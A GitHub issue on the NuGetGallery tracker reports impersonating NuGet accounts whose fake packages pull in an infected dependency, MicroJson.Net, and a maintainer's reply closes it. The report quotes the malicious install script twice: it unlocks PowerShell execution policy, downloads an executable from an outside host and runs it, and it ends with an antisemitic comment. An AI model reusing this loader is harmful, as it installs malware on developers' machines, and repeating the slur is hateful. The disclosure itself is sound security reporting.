### ISSUE TITLE
Microsoft and NuGet have to answer for this

### ISSUE THREAD

**Issue by alfasmartplayer** [NuGet/NuGetGallery#9316]
### NuGet Product Used

NuGet SDK

### Product Version

Trojan

### Repro Steps & Context

https://www.nuget.org/profiles/ExodusOfficial
https://www.nuget.org/profiles/Nuget.0rg
https://www.nuget.org/profiles/Nuget.OrgDev

if you check this users profile it will impersonate all popular libraries by adding an infected dependency. If you examine all the libraries in its profile you can see this dependency all over MicroJson.Net (>= 0.8.5). So the dependency package MicroJson.Net (>= 0.8.5) that infects the computer. This is a very professional scam. I don't understand how you as Nuget allow this. Too bad Microsoft is turning a blind eye to this! I understand from the number of downloads that Nuget.0rg infected more than 1800 people who own this account. This is literally a massacre! Nuget is also responsible for this. I still can't believe you let this happen.

Technical details:
The MicroJson.Net (>= 0.8.5) dependency enables to download the virus to the computer by running init.ps.

param($installPath, $toolsPath, $package)
New-ItemProperty -Path 'HKCU:Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name 'ExecutionPolicy' -Value "Unrestricted" -PropertyType String -Force
$ProcName = "MatteBlack.exe"
$WebFile = "https://slavecentral101.tk/5556775444/2872322/$ProcName" 
Clear-Host
(New-Object System.Net.WebClient).DownloadFile($WebFile,"$env:APPDATA\$ProcName")
Start-Process ("$env:APPDATA\$ProcName")
#Kill jews

Example:

Fake: https://www.nuget.org/packages/Guna.UI.WinForms
Official: https://www.nuget.org/packages/Guna.UI2.WinForms

https://www.veed.io/view/99db7ad5-16df-4ec4-a864-58051595ea3f?sharingWidget=true&panel=share

Actually, today I accidentally had to report the original author of the guna library, it was not his fault... I never thought it was an imitation of the guna library.

### Verbose Logs

```shell
https://www.nuget.org/profiles/ExodusOfficial
https://www.nuget.org/profiles/Nuget.0rg
https://www.nuget.org/profiles/Nuget.OrgDev

if you check this users profile it will impersonate all popular libraries by adding an infected dependency. If you examine all the libraries in its profile you can see this dependency all over MicroJson.Net (>= 0.8.5). So the dependency package MicroJson.Net (>= 0.8.5) that infects the computer. This is a very professional scam. I don't understand how you as Nuget allow this. Too bad Microsoft is turning a blind eye to this! I understand from the number of downloads that Nuget.0rg infected more than 1800 people who own this account. This is literally a massacre! Nuget is also responsible for this. I still can't believe you let this happen.

Technical details:
The MicroJson.Net (>= 0.8.5) dependency enables to download the virus to the computer by running init.ps.

param($installPath, $toolsPath, $package)
New-ItemProperty -Path 'HKCU:Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name 'ExecutionPolicy' -Value "Unrestricted" -PropertyType String -Force
$ProcName = "MatteBlack.exe"
$WebFile = "https://slavecentral101.tk/5556775444/2872322/$ProcName" 
Clear-Host
(New-Object System.Net.WebClient).DownloadFile($WebFile,"$env:APPDATA\$ProcName")
Start-Process ("$env:APPDATA\$ProcName")
#Kill jews

Example:

Fake: https://www.nuget.org/packages/Guna.UI.WinForms
Official: https://www.nuget.org/packages/Guna.UI2.WinForms

https://www.veed.io/view/99db7ad5-16df-4ec4-a864-58051595ea3f?sharingWidget=true&panel=share

Actually, today I accidentally had to report the original author of the guna library, it was not his fault... I never thought it was an imitation of the guna library.
```

**Comment by joelverhagen** [comment]
Hello @alfasmartplayer, thanks for taking the time to report this. We're actively responding to this situation and know about the packages in question.

We take each of these cases as an opportunity to improve our processes moving forward.

We generally don't report ongoing status of such issues on GitHub so I'll close this issue.
